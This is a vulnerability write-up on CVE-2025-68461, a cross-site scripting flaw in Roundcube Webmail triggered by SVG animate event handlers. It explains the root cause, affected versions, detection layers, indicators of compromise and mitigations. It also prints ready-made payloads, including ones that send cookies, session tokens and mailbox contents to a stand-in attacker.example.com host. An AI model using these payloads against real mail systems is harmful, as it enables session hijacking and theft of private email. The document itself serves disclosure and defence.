CVE-2025-68461: Exploiting SVG Animation to Hijack Roundcube Sessions

Vulnerability Summary

Vulnerability Name: Cross-Site Scripting via SVG Animate Tag
CVE ID: CVE-2025-68461
Severity: High
CVSS Score: 7.2
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWE Classification: CWE-79 – Improper Neutralization of Input During Web Page Generation
Exploitability: Network-based, remotely exploitable, no authentication required, no user interaction required

Overview

CVE-2025-68461 is a high-severity cross-site scripting (XSS) vulnerability affecting the Roundcube Webmail application. The issue exists in how Roundcube processes and sanitizes SVG (Scalable Vector Graphics) content, specifically SVG files that use the <animate> element with JavaScript-capable event handlers.

The vulnerability allows an attacker to embed malicious JavaScript inside SVG graphics sent through email. When the email is rendered by Roundcube’s HTML message viewer, the malicious code executes automatically in the victim’s browser. The victim does not need to click a link, download a file, or interact with the message in any special way.

This flaw was discovered and responsibly disclosed by Valentin T. from CrowdStrike and later fixed by the Roundcube development team.

Root Cause Analysis

Roundcube includes an HTML sanitization component (rcube_washtml.php) designed to block dangerous HTML and JavaScript from emails. While this sanitizer correctly filters common threats such as <script> tags and inline JavaScript, it fails to treat SVG animation event handlers as executable code.

SVG is an XML-based image format that browsers render natively. The SVG specification supports animation through the <animate> tag, which includes lifecycle event handlers such as:

onbegin – Executes when the animation starts
onend – Executes when the animation finishes
onrepeat – Executes on each animation loop

Roundcube allows SVG elements as part of legitimate email rendering. However, its sanitizer mistakenly treats animation event attributes as harmless metadata rather than executable JavaScript. This oversight enables attackers to inject JavaScript that runs automatically when the SVG is rendered.

Because the JavaScript runs in the context of the Roundcube web application, it inherits the victim’s session privileges.

Scope and Impact

The CVSS scope is marked as Changed (S:C), meaning the impact extends beyond the vulnerable component itself. Successful exploitation allows attackers to:

Steal session cookies and authentication tokens
Hijack active email sessions
Read private and confidential emails
Send emails as the victim
Modify mailbox rules, forwarding settings, or filters
Launch follow-up phishing or lateral attacks

For organizations using Roundcube internally, this vulnerability poses a serious risk to sensitive business communications, regulated data, and intellectual property.

Affected Versions

Vulnerable Versions

Roundcube Webmail 1.5.x prior to 1.5.12
Roundcube Webmail 1.6.x prior to 1.6.12

Patched Versions

Roundcube Webmail 1.5.12
Roundcube Webmail 1.6.12

The patches were released on December 13, 2025.

Official Advisory:
https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12

Patch Commit:
https://github.com/roundcube/roundcubemail/commit/bfa032631c36b900e7444dfa278340b33cbf7cdb

Immediate upgrading is strongly recommended.

Technical Exploitation Flow

Email Delivery
The attacker sends an HTML email containing an embedded SVG graphic or an SVG attachment. Because Roundcube renders HTML emails automatically, the SVG loads as soon as the message is viewed.
Malicious SVG Construction
The SVG contains a <animate> element with one or more event handlers such as onbegin, which contains JavaScript code.
Sanitizer Bypass
Roundcube’s sanitizer allows the SVG and fails to remove the animation event handler attributes.
Automatic JavaScript Execution
When the browser renders the SVG, the animation starts automatically, triggering the JavaScript payload.
Session Compromise
The attacker’s JavaScript gains access to cookies, local storage, DOM content, and authenticated user actions.

Exploitation Payload Examples

Proof-of-Concept Alert

<svg xmlns="http://www.any_site.org/2000/svg" width="1" height="1">
  <animate attributeName="x"
           from="0"
           to="10"
           dur="1s"
           onbegin="alert('XSS via CVE-2025-68461')" />
</svg>

Session Theft Payload

<svg xmlns="http://www.any_site.org/2000/svg" width="1" height="1">
  <animate attributeName="foo"
           from=""
           to="1"
           dur="0.1s"
           onbegin="fetch('https://attacker.example.com/exfil?cookie=' + document.cookie + '&session=' + localStorage.getItem('roundcube_sessid'))" />
</svg>

Email Content Exfiltration

<svg xmlns="http://www.any_site.org/2000/svg" width="1" height="1">
  <animate attributeName="opacity"
           from="0"
           to="1"
           dur="0.5s"
           onbegin="fetch('https://attacker.example.com/steal', {method:'POST', body:document.querySelector('.messagelist').innerHTML})" />
</svg>

WAF Evasion Variant

<svg xmlns="http://www.any_site.org/2000/svg">
  <animate attributeName="href"
           dur="5s"
           repeatCount="indefinite"
           values="https://safe-url?;javascript:alert(1);0" />
</svg>

Detection and Prevention Strategy

Layer 1: Server-Side SVG Validation

Inspect SVG files before display or download by scanning for dangerous patterns such as:

<script>
javascript:
onbegin=, onend=, onrepeat=
<foreignObject>

Advanced validation should parse SVGs as XML and inspect elements and attributes instead of relying solely on string matching.

Layer 2: Content Disarm and Reconstruction (CDR)

Sanitize SVGs by:

Allowing only safe graphic elements
Removing all event handlers and script-capable attributes
Rebuilding a clean SVG from approved components

This neutralizes malicious payloads while preserving visuals.

Layer 3: Email Gateway Filtering

Block or quarantine SVG attachments at the mail gateway using:

Postfix + Amavis rules
SpamAssassin custom signatures
Rspamd MIME type restrictions

If SVG files are not business-critical, full blocking is the safest option.

Layer 4: Network Traffic Monitoring

Watch for:

Outbound HTTP/HTTPS connections after email viewing
Requests containing cookie=, session=, username=, or password=
Base64-encoded exfiltration data
Traffic to newly registered or suspicious domains (e.g., libcdn[.]org)

IDS/IPS tools like Snort or Suricata should be configured to detect these patterns.

Layer 5: Log and Behavioral Analysis

Indicators include:

SVG attachments viewed unexpectedly
Rapid session token changes
Logins from multiple geographic locations
Emails sent shortly after viewing SVG content
JavaScript execution errors related to SVG or animate tags

Indicators of Compromise (IOCs)

File-Based

SVG files containing <animate> with event handlers
Use of eval(atob()), fetch(), document.cookie
Very small or unusually large SVG attachments
Double extensions (e.g., invoice.pdf.svg)

Network-Based

POST requests to attacker domains
DNS lookups for newly registered domains
Exfiltration of cookies or credentials

Authentication-Based

Impossible travel scenarios
Concurrent sessions from different regions
Credential stuffing attempts after session theft

Emergency Mitigations (If Patching Is Delayed)

Until patching is complete:

Block or force-download SVG files in Roundcube
Block SVG MIME types at the web server level
Enforce strict Content Security Policy headers
Enable detailed logging and session monitoring
Limit Roundcube access to trusted networks or VPN
Notify users not to open SVG attachments

These measures reduce risk but do not fully eliminate it.

Final Takeaway

CVE-2025-68461 is actively exploitable, requires no authentication, and enables silent session hijacking. Temporary mitigations help, but upgrading to Roundcube 1.5.12 or 1.6.12 is the only complete fix.

Organizations should treat this vulnerability as a priority security issue and verify both patch deployment and post-patch monitoring to ensure no compromise occurred before remediation.